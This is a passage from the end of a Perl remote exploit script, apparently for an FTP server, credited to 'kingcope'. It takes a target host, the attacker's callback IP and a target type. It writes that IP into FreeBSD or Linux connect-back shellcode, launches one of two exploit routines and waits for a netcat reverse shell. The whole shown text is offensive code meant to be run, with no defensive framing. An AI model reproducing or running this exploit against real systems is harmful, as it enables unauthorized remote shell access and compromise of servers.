"\xff" . $stack . "\n"; print "Check your netcat?\n"; while(<$sock>) { print; } } sub usage() { print "written by kingcope\n"; print "usage:\n". "proremote.pl <target ip/host> <your ip> <target type>\n\n"; for ($i=0; $i<$numtargets; $i++) { print "\t[".$i."]\t". $targets[$i][0]. "\r\n"; } exit; } if ($#ARGV ne 2) { usage; } $target = $ARGV[0]; $cbip = $ARGV[1]; $ttype = $ARGV[2]; $platform = $targets[$ttype][1]; $style = $targets[$ttype][2]; ($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip")); if ($platform eq "FreeBSD") { $shellcode = $bsdcbsc; substr($shellcode, 37, 4, $a1 . $a2 . $a3 . $a4); } else { if ($platform eq "Linux") { $shellcode = $lnxcbsc; substr($shellcode, 31, 4, $a1 . $a2 . $a3 . $a4); } else { print "typo ?\n"; exit; }} if ($style eq 0) { exploit1; } else { exploit2; } print "done.\n"; exit;